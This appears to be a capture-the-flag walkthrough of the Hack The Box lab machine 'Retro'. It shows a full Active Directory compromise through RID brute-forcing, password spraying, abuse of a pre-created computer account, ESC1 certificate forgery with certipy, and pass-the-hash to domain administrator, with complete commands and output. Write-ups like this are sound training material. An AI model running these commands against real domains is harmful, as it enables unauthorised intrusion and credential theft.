This post is a walkthrough of the Hack The Box (Originally VulnLab Box) room Retro
Hack The Box: Retro â Exploiting Weak Credentials, Pre-Created Computer Accounts, and Certificate Vulnerabilities
Retro is an Easy-rated Windows machine from VulnLabs that offers a fantastic introduction to Active Directory (AD) exploitation, covering weak credential hygiene, pre-created computer account abuse, and certificate template vulnerabilities.
The attack path begins with anonymous LDAP enumeration, revealing a list of domain users through a RID brute-force attack using the default guest account. A simple password spray attack with usernames as passwords yields valid credentials, granting access to network shares. Among these shares, a seemingly innocuous ToDo.txt file provides a critical clueâmentioning outdated finance software and pre-created computer accounts in the domain.
Further enumeration uncovers a neglected computer account with stored credentials, which initially appears useless. However, revisiting NMAP scans reveals a Certificate Authority (CA) running on the Domain Controller. Using Certipy-AD, we discover ESC1 (ESC_TEMPLATE_1), a misconfigured certificate template that allows us to forge a domain administrator certificate, leading to full domain compromise.
This box is an excellent case study in:
Credential spraying & weak password policies
Abandoned pre-created computer accounts
AD CS (Active Directory Certificate Services) exploitation
Stay tuned as we break down each stepâfrom initial enumeration to full domain takeoverâdemonstrating how overlooked configurations in AD can lead to catastrophic security failures.
Why This Box Matters
Retro highlights real-world risks such as:
â Default & weak credentials (guest access, password reuse)
â Poor credential management (pre-created accounts with hardcoded passwords)
â Certificate template misconfigurations (ESC1 leading to privilege escalation)
Recon - NMAP Scan
sudo nmap -T4 -sVC -Pn 10.129.176.201 -v -oA nmap/all-ports --open
Discovered open port 445/tcp on 10.129.176.201
Discovered open port 139/tcp on 10.129.176.201
Discovered open port 3389/tcp on 10.129.176.201
Discovered open port 135/tcp on 10.129.176.201
Discovered open port 53/tcp on 10.129.176.201
Discovered open port 636/tcp on 10.129.176.201
Discovered open port 3269/tcp on 10.129.176.201
Discovered open port 464/tcp on 10.129.176.201
Discovered open port 593/tcp on 10.129.176.201
Discovered open port 88/tcp on 10.129.176.201
Discovered open port 3268/tcp on 10.129.176.201
Discovered open port 389/tcp on 10.129.176.201
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 06:42:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-08T01:55:44
| Not valid after: 2025-10-08T01:55:44
| MD5: 002f:85c3:8610:e398:121b:e154:7e2a:6c78
|_SHA-1: dd93:31ff:e6e3:ac83:4ae6:c380:144f:044f:6ca6:0cd1
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-07-02T06:43:28+00:00
|_ssl-date: 2025-07-02T06:44:08+00:00; 0s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-02T06:43:29
|_ start_date: N/A
Items of interest from NMAP:
Right away we can tell this is an Active Directory box because of the common ports that a domain controller uses such as 53 (DNS) 88 (Kerberos) 389 (LDAP) 636 (LDAPS).
- DC.retro.vl - Domain Controller FQDN / Hostname
- commonName=retro-DC-CA - Certificate Services has been installed on the Domain controller.
- retro.local - Domain Name
Go ahead and add the fqdn and hostname to your /etc/hosts file.
sudo echo -n '10.129.176.201 DC.retro.vl retro.vl dc' >> /etc/hosts
- Knowing we are dealing with Domain Controller we can try to get a list of users using the ‘Guest’ account if enabled.
- NetExec can help check for this.
nxc smb dc -u 'guest' -p '' --rid-brute
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\guest:
SMB 10.129.25.17 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.25.17 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.25.17 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.25.17 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.25.17 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.25.17 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.25.17 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.25.17 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.25.17 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.25.17 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.25.17 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.25.17 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.25.17 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.25.17 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.25.17 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.25.17 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.25.17 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.25.17 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.25.17 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.25.17 445 DC 1109: RETRO\tblack (SidTypeUser)
Carve out just the user names from the output.
nxc smb dc -u 'guest' -p '' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt
This will give us this small list.
Users
cat users.txt
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
We do have two computer accounts listed too. DC$ and BANKING$
Password Spraying Weak Passwords
Next I used the list of usernames as a list for password spraying with NetExec.
nxc smb dc -u users.txt -p users.txt --no-brute --continue-on-success
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.25.17 445 DC [-] retro.vl\BANKING$:BANKING$ STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\jburley:jburley STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\tblack:tblack STATUS_LOGON_FAILURE
Credentials are found for user trainee
SMB Share Enumeration.
Now we have domain credentials we can see if there are any shares this user has access to.
nxc smb dc -u trainee -p trainee --shares
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.25.17 445 DC [*] Enumerated shares
SMB 10.129.25.17 445 DC Share Permissions Remark
SMB 10.129.25.17 445 DC ----- ----------- ------
SMB 10.129.25.17 445 DC ADMIN$ Remote Admin
SMB 10.129.25.17 445 DC C$ Default share
SMB 10.129.25.17 445 DC IPC$ READ Remote IPC
SMB 10.129.25.17 445 DC NETLOGON READ Logon server share
SMB 10.129.25.17 445 DC Notes READ
SMB 10.129.25.17 445 DC SYSVOL READ Logon server share
SMB 10.129.25.17 445 DC Trainees READ
Two shares of interest are listed. ‘Notes’ and ‘Trainees’ are not normal shares on a domain controller.
Starting with the ‘Trainees’ folder we can use smbclient to access the share from our attack box.
smbclient //dc/trainees -U 'retro/trainee%trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 22:58:43 2023
.. DHS 0 Wed Jun 11 15:17:10 2025
Important.txt A 288 Sun Jul 23 23:00:13 2023
4659711 blocks of size 4096. 1283388 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
smb: \>
There’s a file named ‘Important.txt’ in the ‘Trainees share! Download the file to your attack box using the ‘get’ command.
Reading the contents of the file ‘Important.txt’.
cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
This is a message from the Admins to all Trainees basically saying that weak passwords have been implemented to prevent Admin headache! This we already know since we have found out that the passwords for Trainees is just ’trainee’
Moving on to the ‘Notes’ Share. Again we’ll use smbclient to connect and look at the contents.
smbclient //dc/notes -U 'retro/trainee%trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 9 04:12:49 2025
.. DHS 0 Wed Jun 11 15:17:10 2025
ToDo.txt A 248 Sun Jul 23 23:05:56 2023
user.txt A 32 Wed Apr 9 04:13:01 2025
4659711 blocks of size 4096. 1284861 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.3 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \>
Download the ‘ToDo.txt’ and ‘User.txt’ files.
The ‘user.txt’ file is the user flag to submit to HTB, so moving onto.
Reading the ‘ToDo.txt’ file contents.
ToDo.txt Contents:
cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
This is a message from James to Thomas referring to “pre created computer account”. James also mentions the word ‘ancient’ which is possibly a hint to a legacy pre 2000 computer account. These accounts used the same password as the computer name. The computer name for example, ‘FS01’ (Note no $ Sign Hence Legacy) would have a password of ‘FS01’.
Pre2k
NetExec has an option to check for these accounts, so lets give it a go.
nxc ldap dc -u trainee -p trainee -M pre2k
LDAP 10.129.25.17 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.25.17 389 DC [+] retro.vl\trainee:trainee
PRE2K 10.129.25.17 389 DC Pre-created computer account: BANKING$
PRE2K 10.129.25.17 389 DC [+] Found 1 pre-created computer accounts. Saved to /home/red/.nxc/modules/pre2k/retro.vl/precreated_computers.txt
PRE2K 10.129.25.17 389 DC [+] Successfully obtained TGT for banking@retro.vl
PRE2K 10.129.25.17 389 DC [+] Successfully obtained TGT for 1 pre-created computer accounts. Saved to /home/red/.nxc/modules/pre2k/ccache
With this information we can test the account and see if the password is ‘banking’
nxc smb dc -u 'banking$' -p banking
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [-] retro.vl\banking$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet.
NetExec can also use kerberos to authenticate.
nxc smb dc.retro.vl -u 'banking$' -p banking -k
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] retro.vl\banking$:banking
Generate a TGT and verify we can access the server with the TGT ticket.
nxc smb dc.retro.vl -u 'banking$' -p banking -k --generate-tgt banking_tgt
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] retro.vl\banking$:banking
SMB dc.retro.vl 445 DC [+] TGT saved to: banking_tgt.ccache
SMB dc.retro.vl 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=banking_tgt.ccache
export KRB5CCNAME=banking_tgt.ccache
klist
Ticket cache: FILE:banking_tgt.ccache
Default principal: banking$@RETRO.VL
Valid starting Expires Service principal
07/07/25 19:17:30 07/08/25 05:17:30 krbtgt/RETRO.VL@RETRO.VL
renew until 07/08/25 19:17:29
nxc smb dc.retro.vl -u 'banking$' -k --use-kcache --shares
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] RETRO.VL\banking$ from ccache
SMB dc.retro.vl 445 DC [*] Enumerated shares
SMB dc.retro.vl 445 DC Share Permissions Remark
SMB dc.retro.vl 445 DC ----- ----------- ------
SMB dc.retro.vl 445 DC ADMIN$ Remote Admin
SMB dc.retro.vl 445 DC C$ Default share
SMB dc.retro.vl 445 DC IPC$ READ Remote IPC
SMB dc.retro.vl 445 DC NETLOGON READ Logon server share
SMB dc.retro.vl 445 DC Notes READ
SMB dc.retro.vl 445 DC SYSVOL READ Logon server share
SMB dc.retro.vl 445 DC Trainees READ
Ok with nowhere else to go I remembered that we have a Certificate Authority running on the server, so this is where I turned my attention to next.
ESC1 Vulnerability
certipy-ad find -u banking\$@retro.local -k -target dc.retro.vl -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc.retro.vl.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
From the output of ‘certipy-ad’, there is a vulnerability classed as ‘ESC1’ More information on the types of vulnerabilites can be found here
And this particular Vulnerability is here
Brief Description from the Wiki Link
Description
ESC1 is the stereotypical AD CS misconfiguration that can lead directly to privilege escalation. The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators.
So this is what we will be doing in our case.
The Vulnerable Template is ‘RetroClients’ and the CA is ‘retro-DC-CA’. Theese two bits of information will be need next for certipy-ad and also the administrators SID.
NetExec can be used to get the Domain SID and we can just add RID 500 to the end.
nxc ldap dc -u banking -p Password123 -k --get-sid
LDAP dc 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP dc 389 DC [+] retro.vl\banking:Password123
LDAP dc 389 DC Domain SID S-1-5-21-2983547755-698260136-4283918172
The Administrator SID will be: SID S-1-5-21-2983547755-698260136-4283918172-500
Requesting The Administrators PFX
certipy-ad req -username banking\$@retro.vl -k -ca retro-DC-CA -target dc.retro.vl -template RetroClients -upn administrator@retro.vl -key-size=4096 -dns dc.retro.vl -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc.retro.vl.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[*] Successfully requested certificate
[*] Got certificate with multiple identities
UPN: 'administrator@retro.vl'
DNS Host Name: 'dc.retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator_dc.pfx'
[*] Wrote certificate and private key to 'administrator_dc.pfx'
Cool, we now have the administrators pfx file. Now all we need to do is authenticate as administrator for total domain takeover and grab the last flag.
certipy-ad auth -pfx administrator_dc.pfx -dc-ip 10.129.25.17
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN DNS Host Name: 'dc.retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Found multiple identities in certificate
[*] Please select an identity:
[0] UPN: 'administrator@retro.vl' (administrator@retro.vl)
[1] DNS Host Name: 'dc.retro.vl' (dc$@retro.vl)
> 0
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252*********************89
Now we have the NTLM hash of the administrator we can pass-the-hash to gain access to the DC. First we verify this.
nxc smb dc -u administrator -H 252*********************89 -X 'whoami;hostname'
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\administrator:252*********************89 (Pwn3d!)
SMB 10.129.25.17 445 DC [+] Executed command via wmiexec
SMB 10.129.25.17 445 DC retro\administrator
SMB 10.129.25.17 445 DC DC
Confirmed Domain Compromise.
Download the last flag file ‘root.txt’ with NXC
nxc smb dc -u administrator -H 252**********************89 --shares --get-file /users/administrator/desktop/root.txt root.txt
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\administrator:252*********************89 (Pwn3d!)
SMB 10.129.25.17 445 DC [*] Enumerated shares
SMB 10.129.25.17 445 DC Share Permissions Remark
SMB 10.129.25.17 445 DC ----- ----------- ------
SMB 10.129.25.17 445 DC ADMIN$ READ,WRITE Remote Admin
SMB 10.129.25.17 445 DC C$ READ,WRITE Default share
SMB 10.129.25.17 445 DC IPC$ READ Remote IPC
SMB 10.129.25.17 445 DC NETLOGON READ,WRITE Logon server share
SMB 10.129.25.17 445 DC Notes READ
SMB 10.129.25.17 445 DC SYSVOL READ,WRITE Logon server share
SMB 10.129.25.17 445 DC Trainees READ
SMB 10.129.25.17 445 DC [*] Copying "/users/administrator/desktop/root.txt" to "root.txt"
SMB 10.129.25.17 445 DC [+] File "/users/administrator/desktop/root.txt" was downloaded to "root.txt"
âââ(redăżredteam)-[~/.Hacking/HTB/retro]
ââ$ cat root.txt
40f*****************71
And that’s the Box completed with full domain control. At this point we can do whatever we want. â ď¸
